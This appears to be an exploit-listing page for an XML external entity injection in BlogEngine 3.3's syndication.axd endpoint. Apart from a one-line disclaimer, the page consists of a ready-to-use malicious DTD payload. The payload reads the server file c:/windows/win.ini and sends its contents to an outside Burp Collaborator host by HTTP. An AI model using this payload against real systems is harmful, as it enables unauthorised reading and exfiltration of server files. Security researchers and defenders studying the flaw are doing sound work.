Blogengine 3.3 syndication.axd xml external entity injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-05-05 |
Type : webapps |
Platform : xml
This exploit / vulnerability Blogengine 3.3 syndication.axd xml external entity injection is for educational purposes only and if it is used you will do on your own risk!
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM '
http://y76a7hgbrccuyclwxwcp3br74yayyn.burpcollaborator.net/?%data;'>">
-----------------------------
Blogengine 3.3 syndication.axd xml external entity injection